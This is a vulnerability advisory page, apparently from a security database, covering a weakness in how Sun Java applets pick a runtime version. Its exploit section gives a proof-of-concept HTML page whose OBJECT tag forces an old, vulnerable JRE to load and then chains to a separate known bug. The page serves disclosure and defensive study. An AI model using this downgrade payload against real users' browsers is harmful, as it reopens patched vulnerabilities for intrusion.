• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

Sun Java Applet Invocation Version Specification Weakness

An exploit is not required.

The following example was provided:

<html>
<title> Java Version Downgrade proof-of-concept </title>
<body>
Demonstration uses the following vulnerability:
<br>
http://www.securityfocus.com/bid/8879
<br>
Source code for Simple.class:
<br>
http://www.securityfocus.com/bid/8879/exploit/
<p>
Added this code to Simple.java for debugging purposes:
<br>
String javaVersion = System.getProperty("java.version");
<br>
addItem("Java version: " + javaVersion);
<p>
This proof-of-concept was tested on a Windows system using IE with
the following Java installations:
<br>
Sun JRE 1.3.1_07 (vulnerable to BID 8879)
<br>
Sun JRE 1.3.1_13 (not vulnerable to BID 8879)
<br>
note: invoking applet normally should run Simple.class in JRE
1.3.1_13.
<p>
<OBJECT classid="clsid:CAFEEFAC-0013-0001-0007-ABCDEFFEDCBA"
width = "600" height = "100"
codebase="http://java.sun.com/products/plugin/autodl/jinstall-1_3_1_07-windows-i586.cab##Version=1_3_1_07">
<PARAM NAME="code" VALUE="Simple.class">
</OBJECT>
</body>
</html>